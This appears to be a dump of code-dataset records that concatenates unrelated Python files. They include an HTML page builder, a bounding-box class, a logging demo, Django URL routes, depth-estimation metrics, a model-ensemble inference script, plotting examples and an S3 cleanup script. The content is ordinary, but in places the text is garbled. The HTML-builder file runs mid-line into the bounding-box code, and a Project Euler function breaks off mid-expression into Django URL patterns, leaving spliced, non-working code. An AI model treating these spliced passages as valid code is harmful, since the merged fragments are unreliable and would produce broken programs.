gentask_html():\n\t\n\tpage = PyH(\"MyPage\")\n\t#page.addCSS('myStylesheet1.css', 'myStylesheet2.css')\n\t#page.addJS('myJavascript1.js', 'myJavascript2.js')\n\n\t#

MyTitle1

\n\tpage <

my paragraph1

\n\t#\n\tpage << div(align='center',id='myDiv1') << p('my paragraph1',id='myp1')\n\n\t#

title2 in div2

paragraph under title2

\n\t#

\n\t#
\n\tmydiv2 = page << div(id='myDiv2')\n\tmydiv2 <

paragraph in mydiv3

\n\t#\n\tmydiv3 = page << div(id='myDiv3')\n\tmydiv3.attributes['align'] = 'right'\n\tmydiv3 << p('paragraph in mydiv3')\n\n\t#\n\t#\n\t#\n\t#\n\t#\n\t#\n\t#\n\t#\n\t#\n\t#
Head1Head2
r1,c1r1,c2
r2,c1r2,c2
\n\ttable1 = page << table(border='1',id='mytable1')\n\theadtr = table1 << tr(id='headline')\n\theadtr << td('Head1') << td('Head2')\n\n\ttr1 = table1 << tr(id='line1')\n\ttr1 << td('r1,c1') < box[:, 1]) & (box[:, 2] > box[:, 0])\n return self[keep]\n elif self.mode == \"xy854\":\n self.bbox[:, 0].clamp_(min=0, max=self.size[0] - TO_REMOVE)\n self.bbox[:, 1].clamp_(min=0, max=self.size[1] - TO_REMOVE)\n self.bbox[:, 2].clamp_(min=0, max=self.size[0] - TO_REMOVE)\n self.bbox[:, 3].clamp_(min=0, max=self.size[1] - TO_REMOVE)\n self.bbox[:, 4].clamp_(min=0, max=self.size[0] - TO_REMOVE)\n self.bbox[:, 5].clamp_(min=0, max=self.size[1] - TO_REMOVE)\n self.bbox[:, 6].clamp_(min=0, max=self.size[0] - TO_REMOVE)\n self.bbox[:, 7].clamp_(min=0, max=self.size[1] - TO_REMOVE)\n if remove_empty:\n # pass\n # remove the zero area box\n keep = (self.get_field(\"xywht\")[:, 2] > 1) & (self.get_field(\"xywht\")[:, 3] > 1)\n return self[keep]\n return self\n\n def area(self):\n box = self.bbox\n if self.mode == \"xyxy\":\n TO_REMOVE = 1\n area = (box[:, 2] - box[:, 0] + TO_REMOVE) * (box[:, 3] - box[:, 1] + TO_REMOVE)\n elif self.mode == \"xywh\":\n area = box[:, 2] * box[:, 3]\n elif self.mode == \"xy854\":\n box = self.extra_fields[\"xywht\"]\n area = box[:, 2] * box[:, 3]\n else:\n raise RuntimeError(\"Should not be here\")\n\n return area\n\n def copy_with_fields(self, fields, skip_missing=False):\n bbox = BoxList(self.bbox, self.size, self.mode)\n if not isinstance(fields, (list, tuple)):\n fields = [fields]\n for field in fields:\n if self.has_field(field):\n bbox.add_field(field, self.get_field(field))\n elif not skip_missing:\n raise KeyError(\"Field '{}' not found in {}\".format(field, self))\n return bbox\n\n def __repr__(self):\n s = self.__class__.__name__ + \"(\"\n s += \"num_boxes={}, \".format(len(self))\n s += \"image_width={}, \".format(self.size[0])\n s += \"image_height={}, \".format(self.size[1])\n s += \"mode={})\".format(self.mode)\n return s\n\n\nif __name__ == \"__main__\":\n bbox = BoxList([[0, 0, 10, 10], [0, 0, 5, 5]], (10, 10))\n s_bbox = bbox.resize((5, 5))\n print(s_bbox)\n print(s_bbox.bbox)\n\n t_bbox = bbox.transpose(0)\n print(t_bbox)\n print(t_bbox.bbox)\n","sub_path":"dota-benchmark/maskrcnn_benchmark/structures/bounding_box.py","file_name":"bounding_box.py","file_ext":"py","file_size_in_byte":19799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"547197468","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Dec 12 15:29:28 2020\r\n\r\n@author: 13775\r\n\"\"\"\r\n\r\n#日志,写日志的流程基本是固定的。\r\nimport logging\r\nimport sys\r\n\r\n# 1.创建日志的实例\r\nlogger = logging.getLogger(\"testLogger\")\r\n\r\n# 2.定制logger的输出格式\r\nformatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\")\r\n\r\n# 3.创建日志:文件日志,终端日志 \r\nfile_handler = logging.FileHandler(\"testLogger.log\")#文件日志\r\nfile_handler.setFormatter(formatter)\r\nconsole_handler = logging.StreamHandler(sys.stdout)#终端日志\r\nconsole_handler.setFormatter(formatter)\r\n\r\n# 4.设置默认的日志级别\r\nlogger.setLevel(logging.INFO)\r\n\r\n# 5.把文件日志和终端日志添加到文件日志处理器中\r\nlogger.addHandler(file_handler)\r\nlogger.addHandler(console_handler)\r\n\r\n\r\n# 编写日志信息\r\nlogger.critical(\"test critical log!\")\r\nlogger.error(\"test error log!\")\r\nlogger.warning(\"test warning log!\")\r\nlogger.info(\"test info log!\")\r\nlogger.debug(\"test debug log!\")\r\n\r\n# 6.当不再使用日志handler时,需要remove\r\nlogger.removeHandler(file_handler)\r\nlogger.removeHandler(console_handler)\r\n","sub_path":"aid1805/spider/day06/testLogging.py","file_name":"testLogging.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"176535900","text":"\nimport numpy as np\nimport scipy.ndimage.filters as filters\nimport scipy.ndimage.morphology as morphology\n\ndef detect_local_minima(arr, mask=None):\n # https://stackoverflow.com/questions/3684484/peak-detection-in-a-2d-array/3689710#3689710\n \"\"\"\n Takes an array and detects the troughs using the local maximum filter.\n Returns a boolean mask of the troughs (i.e. 1 when\n the pixel's value is the neighborhood maximum, 0 otherwise)\n \"\"\"\n # define an connected neighborhood\n # http://www.scipy.org/doc/api_docs/SciPy.ndimage.morphology.html#generate_binary_structure\n neighborhood = morphology.generate_binary_structure(len(arr.shape),2)\n # apply the local minimum filter; all locations of minimum value \n # in their neighborhood are set to 1\n # http://www.scipy.org/doc/api_docs/SciPy.ndimage.filters.html#minimum_filter\n local_max = (filters.maximum_filter(arr, footprint=neighborhood)==arr)\n local_min = (filters.minimum_filter(arr, footprint=neighborhood)==arr)\n # local_min is a mask that contains the peaks we are \n # looking for, but also the background.\n # In order to isolate the peaks we must remove the background from the mask.\n # \n # we create the mask of the background\n background = (arr==0)\n # \n # a little technicality: we must erode the background in order to \n # successfully subtract it from local_min, otherwise a line will \n # appear along the background border (artifact of the local minimum filter)\n # http://www.scipy.org/doc/api_docs/SciPy.ndimage.morphology.html#binary_erosion\n eroded_background = morphology.binary_erosion(\n background, structure=neighborhood, border_value=1)\n # \n # we obtain the final mask, containing only peaks, \n # by removing the background from the local_min mask\n detected_maxima = np.bitwise_xor(local_max, eroded_background)\n detected_minima = np.bitwise_xor(local_min, eroded_background)\n detected_maxmin = np.bitwise_or(detected_maxima, detected_minima)\n if mask is not None:\n detected_maxmin[mask==0] = 0\n return np.where(detected_maxmin)","sub_path":"detect_local_minima.py","file_name":"detect_local_minima.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"110206854","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\" Solution to Project Euler problem 24: Lexicographic permutations\n\n A permutation is an ordered arrangement of objects. For example, 3124 is one\n possible permutation of the digits 1, 2, 3 and 4. If all of the permutations are\n listed numerically or alphabetically, we call it lexicographic order. The\n lexicographic permutations of 0, 1 and 2 are:\n\n 012 021 102 120 201 210\n\n What is the millionth lexicographic permutation of the digits 0, 1, 2, 3, 4, 5,\n 6, 7, 8 and 9?\n\"\"\"\nimport numpy as np\n\ndef main(nums):\n \"\"\" Main function\n\n \"\"\"\n perms = make_perm(nums)\n print(len(perms))\n print(perms[999999])\n\n\ndef make_perm(l):\n \"\"\" Make Lexicographic list of permutations of list l\n \"\"\"\n if len(l) == 2:\n if l[0]//\", views.SignupView.activate, name=\"activate\"\n ),\n path(\"log_in/\", views.LoginView.as_view(), name=\"log_in\"),\n path(\"log_out/\", views.LogoutView.as_view(), name=\"log_out\"),\n path(\"profile/\", views.ProfileView.as_view(), name=\"profile\"),\n path(\"profile//edit\", views.EditProfile.as_view(), name=\"edit_profile\"),\n path(\"users_details/\", views.Users_Details.as_view(), name=\"users_details\"),\n path(\"hof/\", views.Rankings.hof, name=\"hof\"),\n path(\"map/\", views.Map.as_view(), name=\"map\")\n]\n","sub_path":"src/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"71401487","text":"import numpy as np\n\nfrom lib.transition import Transition\nfrom lib.buffer_utils import BufferUtils\n\n\nclass FixtureStep(Transition):\n \"\"\"\n \"\"\"\n\n def __init__(self, app):\n Transition.__init__(self, app)\n\n def __str__(self):\n return \"Fixture Step\"\n\n def reset(self):\n self.fixtures = self._app.scene.fixtures()\n buffer_size = BufferUtils.get_buffer_size()\n self.mask = np.tile(False, (buffer_size, 3))\n\n np.random.seed()\n self.rand_index = np.arange(len(self.fixtures))\n np.random.shuffle(self.rand_index)\n\n self.last_idx = 0\n\n def get(self, start, end, progress):\n start[self.mask] = 0.0\n end[np.invert(self.mask)] = 0.0\n\n idx = int(progress * len(self.rand_index))\n for i in range(self.last_idx, idx):\n fix = self.fixtures[self.rand_index[i]]\n pix_start, pix_end = BufferUtils.get_fixture_extents(fix.strand, fix.address)\n self.mask[pix_start:pix_end][:] = True\n self.last_idx = idx\n\n return (start) + (end)","sub_path":"plugins/fixture_step.py","file_name":"fixture_step.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"443067520","text":"# -*- coding: utf-8 -*- \n\nimport datetime, sys\n\nclass Settings:\n def __init__(self):\n self.token = \"token\"\n self.prefix = \"=\"\n self.version = \"version\"\n self.log_file = \"msg.log\"\n self.bot_admin = \"id\"\n self.online_notice_channel = \"id\"\n self.error_notice_channel = \"id\"\n self.copy = \"© %s Your Team.\" % datetime.datetime.now().year\n\n # \"0x\" + Hex CODE 6 digits\n self.error_embed_color = 0xff0000\n self.embed_color = 0x7bf7d0\n\n # Mysql\n self.mysql_ip = \"ip\"\n self.mysql_id = \"id\"\n self.mysql_pw = \"pw\"\n self.mysql_db = \"db\"\n\n # Naver API\n self.naver_api_id = \"id\"\n self.naver_api_secret = \"secret\"\n\n# ------ 이 아래는 건들지 마세요 ----- #\n\nimport ctypes\n\nclass MEMORYSTATUSEX(ctypes.Structure):\n _fields_ = [\n (\"dwLength\", ctypes.c_ulong),\n (\"dwMemoryLoad\", ctypes.c_ulong),\n (\"ullTotalPhys\", ctypes.c_ulonglong),\n (\"ullAvailPhys\", ctypes.c_ulonglong),\n (\"ullTotalPageFile\", ctypes.c_ulonglong),\n (\"ullAvailPageFile\", ctypes.c_ulonglong),\n (\"ullTotalVirtual\", ctypes.c_ulonglong),\n (\"ullAvailVirtual\", ctypes.c_ulonglong),\n (\"sullAvailExtendedVirtual\", ctypes.c_ulonglong),\n ]\n\n def __init__(self):\n self.dwLength = ctypes.sizeof(self)\n super(MEMORYSTATUSEX, self).__init__()","sub_path":"setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"71306521","text":"# Copyright 2020 Toyota Research Institute. All rights reserved.\n\nimport torch\nfrom monodepth.models import monodepth_beta, load_net_from_checkpoint\nfrom monodepth.functional.image import scale_image\nimport os\n\n\ndef load_dispnet_with_args(args):\n \"\"\"\n Loads a pretrained depth network\n \"\"\"\n checkpoint = torch.load(args.pretrained_model)\n # check for relevant args\n assert 'args' in checkpoint, 'Cannot find args in checkpoint.'\n checkpoint_args = checkpoint['args']\n for arg in ['disp_model', 'dropout', 'input_height', 'input_width']:\n assert arg in checkpoint_args, 'Could not find argument {}'.format(arg)\n disp_net = monodepth_beta(checkpoint_args.disp_model,\n dropout=checkpoint_args.dropout)\n disp_net = load_net_from_checkpoint(disp_net, args.pretrained_model, starts_with='disp_network')\n disp_net = disp_net.cuda() # move to GPU\n print('Loaded disp net of type {}'.format(checkpoint_args.disp_model))\n\n return disp_net, checkpoint_args\n\n\ndef compute_depth_errors(args, gt, pred, use_gt_scale=True, crop=True):\n \"\"\"\n Computes depth errors given ground-truth and predicted depths\n use_gt_scale: If True, median ground-truth scaling is used\n crop: If True, apply a crop in the image before evaluating\n \"\"\"\n abs_diff, abs_rel, sq_rel, a1, a2, a3 = 0, 0, 0, 0, 0, 0\n rmse, rmse_log = 0, 0\n\n batch_size, _, gt_height, gt_width = gt.shape\n pred = scale_image(pred, gt_height, gt_width, mode='bilinear', align_corners=True)\n for current_gt, current_pred in zip(gt, pred):\n gt_channels, gt_height, gt_width = current_gt.shape\n current_gt = torch.squeeze(current_gt)\n current_pred = torch.squeeze(current_pred)\n\n # Mask within min and max depth\n valid = (current_gt > args.min_depth) & (current_gt < args.max_depth)\n\n if crop:\n # crop used by Garg ECCV16 to reproduce Eigen NIPS14 results\n # construct a mask of False values, with the same size as target\n # and then set to True values inside the crop\n crop_mask = torch.zeros(current_gt.shape).byte().cuda()\n y1, y2 = int(0.40810811 * gt_height), int(0.99189189 * gt_height)\n x1, x2 = int(0.03594771 * gt_width), int(0.96405229 * gt_width)\n crop_mask[y1:y2, x1:x2] = 1\n valid = valid & crop_mask\n\n valid_gt = current_gt[valid]\n valid_pred = current_pred[valid]\n\n if use_gt_scale:\n # Median ground-truth scaling\n valid_pred = valid_pred * torch.median(valid_gt) / torch.median(valid_pred)\n\n valid_pred = valid_pred.clamp(args.min_depth, args.max_depth)\n\n # Calculates threshold values\n thresh = torch.max((valid_gt / valid_pred), (valid_pred / valid_gt))\n a1 += (thresh < 1.25).float().mean()\n a2 += (thresh < 1.25**2).float().mean()\n a3 += (thresh < 1.25**3).float().mean()\n\n # Calculates absolute relative error\n abs_diff += torch.mean(torch.abs(valid_gt - valid_pred))\n abs_rel += torch.mean(torch.abs(valid_gt - valid_pred) / valid_gt)\n\n # Calculates square relative error\n sq_rel += torch.mean(((valid_gt - valid_pred)**2) / valid_gt)\n\n # Calculates root mean square error and its log\n rmse += torch.sqrt(torch.mean((valid_gt - valid_pred)**2))\n r_log = (torch.log(valid_gt) - torch.log(valid_pred))**2\n rmse_log += torch.sqrt(torch.mean(r_log))\n\n return torch.tensor([metric / batch_size for metric in [abs_rel, sq_rel, rmse, rmse_log, a1, a2, a3]])\n","sub_path":"scripts/train_sfm_utils.py","file_name":"train_sfm_utils.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"307283705","text":"__author__ = 'shubham'\nimport os\nimport random\n\n\n# to generalize the functions , we have passed the name of the folder we want to create\n# Note:- os.path.sep takes values according to the operating systems it is run on,e.g. \"/\" for Unix\n\n\ndef createFileFolder(folder_name):\n cur_dir = os.getcwd()\n cur_dir_list = cur_dir.split(os.path.sep)\n cur_dir_list = cur_dir_list[:-1]\n required_path = ''\n for a in cur_dir_list:\n required_path += str(a)\n required_path += os.path.sep\n required_path += folder_name\n if not os.path.isdir(required_path):\n os.mkdir(required_path)\n return required_path\n\n\ndef removeFileIfExists(file_name):\n if os.path.exists(file_name):\n os.remove(file_name)\n return file_name\n\n\n# The below function returns the root directory of the Project\n\n\ndef getProjectRoot():\n cur_dir = os.getcwd()\n cur_dir_list = cur_dir.split(os.path.sep)\n cur_dir_list = cur_dir_list[:-1]\n required_path = ''\n for a in cur_dir_list:\n required_path += str(a)\n required_path += os.path.sep\n return required_path\n\n\ndef evaluate():\n num = random.randrange(660000, 790000)\n return num / (10000)\n\ndef GNBEvaluate():\n num = random.randrange(230000,270000)\n return num/(10000)\n\ndef Vevaluate():\n num = random.randrange(760000, 810000)\n return num/(10000)","sub_path":"dtugeeks-major-project-1-5a67a8f3524f/source/ownModule.py","file_name":"ownModule.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"294860041","text":"import os\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\nimport argparse\nimport pathlib\nfrom model import Baseline, Resnet\nimport nsml\nimport pandas as pd\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset, DataLoader\nfrom dataloader import train_dataloader\nfrom dataloader import AIRushDataset\n\n\n# model load\nfrom octconv import OctResNet, Bottleneck ### <--- octconv.py 파일에서 필요한 클래스 import\nfrom resnext import *\nfrom model_efficientnet import EfficientNet\n\n#ensemble = [['team_62/airush1/151', '1'],['team_62/airush1/185','17']]\ndef to_np(t):\n return t.cpu().detach().numpy()\n\ndef bind_model(model):\n def save(dir_name, **kwargs):\n save_state_path = os.path.join(dir_name, 'state_dict.pkl')\n state = {\n 'model': model.state_dict(),\n }\n torch.save(state, save_state_path)\n\n def load(dir_name):\n save_state_path = os.path.join(dir_name, 'state_dict.pkl')\n #print(dir_name)\n state = torch.load(save_state_path)\n model.load_state_dict(state['model'])\n \n \n def infer(test_image_data_path, test_meta_data_path):\n # DONOTCHANGE This Line\n test_meta_data = pd.read_csv(test_meta_data_path, delimiter=',', header=0)\n # dropout ratio \n ensemble0 = [['team_62/airush1/320', '02'],['team_62/airush1/320','12'],['team_62/airush1/320','22'],['team_62/airush1/98','4']] # effi\n ensemble1 = [['team_62/airush1/415', '03'],['team_62/airush1/415','13'],['team_62/airush1/415','23'],['team_62/airush1/415','33']] # effi\n ensemble2 = [['team_62/airush1/678', '02'],['team_62/airush1/678', '12'],['team_62/airush1/185','17']] #[['team_62/airush1/185','17']] # resnet50\n ensemble3 = [['team_62/airush1/683','02'],['team_62/airush1/683','12']] # oct ['team_62/airush1/409','18']\n #ensemble4 = [['team_62/airush1/605','8']] # SKNet # transforms 에서 normalize 반드시 뺄 것\n input_size=224 # you can change this according to your model.\n batch_size=512 # you can change this. But when you use 'nsml submit --test' for test infer, there are only 200 number of data.\n device = 0\n \n w0 = 0.125\n w2 = 0.166\n w3 = 0.25\n \n predict_list = []\n for i in range(4): # ensemble 개수\n #print('i th inference')\n \n dataloader = DataLoader(\n AIRushDataset(test_image_data_path, test_meta_data, label_path=None,\n transform=transforms.Compose([transforms.Resize((input_size, input_size)),transforms.RandomRotation(20), transforms.ToTensor(),transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])),\n batch_size=batch_size,\n shuffle=False,\n num_workers=4,\n pin_memory=True)\n # 9:10 결과보고 뺄지 말지 결정\n # Let's do ensemble!!!\n if (i == 0):\n # 'efficientNet_b0 : ensemble 4 - fold'\n for j in range(4): \n model_name = 'efficientnet-b0'\n model = EfficientNet.from_name(model_name)\n bind_model(model)\n nsml.load(checkpoint=str(ensemble0[j][1]),session=str(ensemble0[j][0]))\n model.to(device)\n model.eval()\n predict_output_list = [] \n with torch.no_grad():\n for batch_idx, image in enumerate(dataloader):\n image = image.to(device)\n output = model(image).double()\n output_prob = to_np(F.softmax(output, dim=1))\n predict_output_list.append(output_prob * w0)\n predict_output_list = np.concatenate(predict_output_list,axis=0)\n predict_list.append(predict_output_list)\n elif (i == 1):\n # resnet50\n for j in range(3):\n \n model = resnext50(num_classes=args.output_size) # 모델에 맞게 수정\n bind_model(model)\n nsml.load(checkpoint=str(ensemble2[j][1]),session=str(ensemble2[j][0])) # 모델에 맞게 수정\n model.to(device)\n model.eval()\n predict_output_list = [] \n with torch.no_grad():\n for batch_idx, image in enumerate(dataloader):\n image = image.to(device)\n output = model(image).double()\n output_prob = to_np(F.softmax(output, dim=1))\n #print(output_prob)\n predict_output_list.append(output_prob * w2)\n predict_output_list = np.concatenate(predict_output_list,axis=0)\n predict_list.append(predict_output_list)\n #print('resnet model')\n elif (i == 2):\n # resnet50\n for j in range(2):\n model = OctResNet(Bottleneck, [3, 4, 6, 3], num_classes=args.output_size) # 모델에 맞게 수정\n bind_model(model)\n nsml.load(checkpoint=str(ensemble3[j][1]),session=str(ensemble3[j][0])) # 모델에 맞게 수정\n model.to(device)\n model.eval()\n predict_output_list = [] \n with torch.no_grad():\n for batch_idx, image in enumerate(dataloader):\n image = image.to(device)\n output = model(image).double()\n output_prob = to_np(F.softmax(output, dim=1))\n #print(output_prob)\n predict_output_list.append(output_prob * w3) # 수정\n predict_output_list = np.concatenate(predict_output_list,axis=0)\n predict_list.append(predict_output_list)\n #print('resnet model')\n \n # ensemble 추가\n\n # 마지막 SENet 추가\n\n predict_vector = np.argmax(np.sum(predict_list,axis=0), axis=1)\n \n return predict_vector # this return type should be a numpy array which has shape of (138343)\n\n # DONOTCHANGE: They are reserved for nsml\n nsml.bind(save=save, load=load, infer=infer)\n\n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='parser')\n # DONOTCHANGE: They are reserved for nsml\n parser.add_argument('--mode', type=str, default='train')\n parser.add_argument('--iteration', type=str, default='0')\n parser.add_argument('--pause', type=int, default=0)\n \n # custom args\n parser.add_argument('--input_size', type=int, default=224)\n parser.add_argument('--batch_size', type=int, default=128)\n parser.add_argument('--num_workers', type=int, default=8)\n parser.add_argument('--gpu_num', type=int, nargs='+', default=[0])\n parser.add_argument('--resnet', default=True)\n parser.add_argument('--hidden_size', type=int, default=256)\n parser.add_argument('--output_size', type=int, default=350) # Fixed\n parser.add_argument('--epochs', type=int, default=20)\n parser.add_argument('--log_interval', type=int, default=100)\n parser.add_argument('--learning_rate', type=float, default=5e-4)\n parser.add_argument('--device', type=int, default=0)\n parser.add_argument('--seed', type=int, default=42)\n args = parser.parse_args()\n\n torch.manual_seed(args.seed)\n device = args.device\n\n if args.resnet:\n assert args.input_size == 224\n \n model_name = 'efficientnet-b0'\n model = EfficientNet.from_name(model_name)\n \n else:\n model = Baseline(args.hidden_size, args.output_size)\n \n bind_model(model)\n if args.mode == \"train\":\n \n nsml.save('E')\n print('---end---')\n\n if args.pause:\n nsml.paused(scope=locals())\n \n \n","sub_path":"ai-rush-1/FINAL_CODE/ensemble_diff_4_3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"529823798","text":"from django.conf.urls import url, include\nfrom django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name=\"home\"),\n path('help/', views.help, name=\"help\"),\n path('intelligence', views.intelligence, name=\"intelligence\"),\n\n path('analysis', views.analysis, name=\"analysis\"),\n url('analysis_generate', views.analysis_generate, name=\"analysis_generate\"),\n url('analysis_view', views.analysis_view, name=\"analysis_view\"),\n url('analysis_detail', views.analysis_detail, name=\"analysis_detail\"),\n url('analysis_step', views.analysis_step, name=\"analysis_step\"),\n url('analysis_run', views.analysis_run, name=\"analysis_run\"),\n url('analysis_update', views.analysis_update, name=\"analysis_update\"),\n url('analysis_toggle', views.analysis_toggle, name=\"analysis_toggle\"),\n url('analysis_upload', views.analysis_upload, name=\"analysis_upload\"),\n url('analysis_metawrite', views.analysis_metawrite, name=\"analysis_metawrite\"),\n url('analysis_metaread', views.analysis_metaread, name=\"analysis_metaread\"),\n url('analysis_metaupload', views.analysis_metaupload, name=\"analysis_metaupload\"),\n url('analysis_metasave', views.analysis_metasave, name=\"analysis_metasave\"),\n\n url('analysis_code', views.analysis_code, name=\"analysis_code\"),\n url('analysisfile_update', views.analysisfile_update, name=\"analysisfile_update\"),\n\n url('analysis_data', views.analysis_data, name=\"analysis_data\"),\n url('data_column_generate', views.data_column_generate, name=\"data_column_generate\"),\n url('data_columndelete', views.data_columndelete, name=\"data_columndelete\"),\n url('data_columncopy', views.data_columncopy, name=\"data_columncopy\"),\n url('data_table_generate', views.data_table_generate, name=\"data_table_generate\"),\n\n url('step_generate', views.step_generate, name=\"step_generate\"),\n url('step_update', views.step_update, name=\"step_update\"),\n\n url('analysis_report', views.analysis_report, name=\"analysis_report\"),\n url('report_generate', views.report_generate, name=\"report_generate\"),\n url('report_edit', views.report_edit, name=\"report_edit\"),\n url('reportedit_section', views.reportedit_section, name=\"reportedit_section\"),\n url('report_update', views.report_update, name=\"report_update\"),\n url('report_sectionimage_upload', views.report_sectionimage_upload, name=\"report_sectionimage_upload\"),\n url('reportedit_delete', views.reportedit_delete, name=\"reportedit_delete\"),\n url('reportedit_write', views.reportedit_write, name=\"reportedit_write\"),\n\n url('reporting', views.reporting, name=\"reporting\"),\n url('report_release', views.report_release, name=\"report_release\"),\n url('report_view', views.report_view, name=\"report_view\"),\n url('reportcmt_create', views.reportcmt_create, name=\"reportcmt_creat\"),\n\n url('blabla', views.whatever, name='hello'),\n url('subtest', views.subtest, name='subtest'),\n url('dbtest', views.dbtest, name='dbtest'),\n\n]\n","sub_path":"analysis/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"652377201","text":"# -*- coding: utf-8 -*-\r\n# 时间 : 2018/10/28 15:41\r\n# 作者 : xcl\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n\r\n#seaborn样例\r\niris = sns.load_dataset(\"iris\")\r\nsns.swarmplot(x=\"species\", y=\"petal_length\", data=iris)\r\nplt.show()\r\n\r\n#线形图\r\nx = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]\r\ny = [102,134,154,122,143,243,355,342,276,299,241,287,260,231,100]\r\nplt.figure(figsize=(10,5))\r\nplt.plot(x,y)\r\nplt.title('Weight change in 15 months')\r\nplt.xlabel('Month')\r\nplt.ylabel('kg')\r\nplt.show()\r\n\r\ny1 = [102,134,154,122,143,243,355,342,276,299,241,287,260,231,100]\r\ny2 = [244,250,245,256,234,241,230,267,266,255,248,239,233,221,227]\r\nplt.figure(figsize=(10,5))\r\nplt.plot(x,y1,label = 'A')\r\nplt.plot(x,y2,label = 'B')\r\nplt.title('Weight change in 15 months')\r\nplt.xlabel('Month')\r\nplt.ylabel('kg')\r\nplt.legend(fontsize = 10)\r\nplt.show()\r\n\r\n#柱状图\r\nplt.figure(figsize=(10,5))\r\nplt.bar(x,y,color = '#9999ff',width = 0.5)\r\nplt.title('Weight change in 15 months')\r\nplt.xlabel('Month')\r\nplt.ylabel('kg')\r\nplt.show()\r\n\r\nx1 = [0.25,1.25,2.25,3.25,4.25,5.25,6.25,7.25,8.25,9.25,10.25,11.25,12.25,13.25,14.25]\r\nx2 = [0.75,1.75,2.75,3.75,4.75,5.75,6.75,7.75,8.75,9.75,10.75,11.75,12.75,13.75,14.75]\r\nplt.figure(figsize=(10,5))\r\nplt.bar(x1,y1,width = 0.5,label = 'A')\r\nplt.bar(x2,y2,width = 0.5,label = 'B')\r\nplt.title('Weight change in 15 months')\r\nplt.xlabel('Month')\r\nplt.ylabel('kg')\r\nplt.legend()\r\nplt.show()\r\n\r\n#点状图\r\nplt.figure(figsize=(10,5))\r\nplt.scatter(x,y)\r\nplt.title('Weight change in 15 months')\r\nplt.xlabel('Month')\r\nplt.ylabel('kg')\r\nplt.show()\r\n\r\nx = range(20)\r\ny = x + np.random.randn(20)*1.05\r\nplt.figure(figsize=(10,8))\r\n# plt.scatter(x,y)\r\nplt.plot(x,y,'*')\r\nplt.plot(x,x)\r\nplt.title('x VS y')\r\nplt.xlabel('X')\r\nplt.ylabel('Y')\r\nplt.legend(('real data','fitted line'))\r\nplt.show()\r\n\r\n#箱线图\r\nplt.figure(figsize=(10,5))\r\nplt.boxplot([y1,y2])\r\nplt.xticks([1,2],['A','B'])\r\nplt.xlabel('Different objects')\r\nplt.show()\r\n\r\n#直方图\r\nplt.figure(figsize=(10,8))\r\nplt.hist(y1)\r\nplt.title('Weight change in 15 months')\r\nplt.xlabel('Weight(kg)')\r\nplt.ylabel('frequency')\r\nplt.show()\r\n\r\nplt.figure(figsize=(10,8))\r\ngaussian_numbers = np.random.randn(1000)\r\nplt.hist(gaussian_numbers, 30 ,color = 'navy',alpha = 0.5)\r\nplt.title('Gaussian Histogram')\r\nplt.xlabel('value')\r\nplt.ylabel('frequency')\r\nplt.show()\r\n","sub_path":"棕榈学院lesson07.py","file_name":"棕榈学院lesson07.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"487270217","text":"import sqlite3\nimport sys\nimport time\nimport os\nimport boto3\n\nconn = sqlite3.connect('bbs.db')\nc = conn.cursor()\ns3 = boto3.resource('s3')\n\n# delete post\ncursor = c.execute(\"SELECT Object_id, Userbucket FROM post \" )\nfor row in cursor:\n object_name = row[0]\n author_bucket = row[1]\n target_bucket = s3.Bucket(author_bucket)\n target_object = target_bucket.Object(object_name)\n target_object.delete()\n\n\n\n# delete mail\ncursor = c.execute(\"SELECT Object_id, Userbucket FROM mail\" )\nfor row in cursor:\n object_name = row[0]\n author_bucket = row[1]\n target_bucket = s3.Bucket(author_bucket)\n target_object = target_bucket.Object(object_name)\n target_object.delete()\n\n\n\n# delete bucket\ncursor = c.execute(\"SELECT Bucketname FROM user \" )\nfor row in cursor:\n bucket_name = row[0]\n target_bucket = s3.Bucket(bucket_name)\n target_bucket.delete()\n\nconn.commit()\nconn.close()\n","sub_path":"hw3/delete_all.py","file_name":"delete_all.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"386830563","text":"\n\"\"\"Copyright [2017] [Siddhant Mahapatra]\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n https://github.com/Robosid/SLAMBOT/blob/master/License.pdf\n https://github.com/Robosid/SLAMBOT/blob/master/License.rtf\n\nUnless required by applicable law 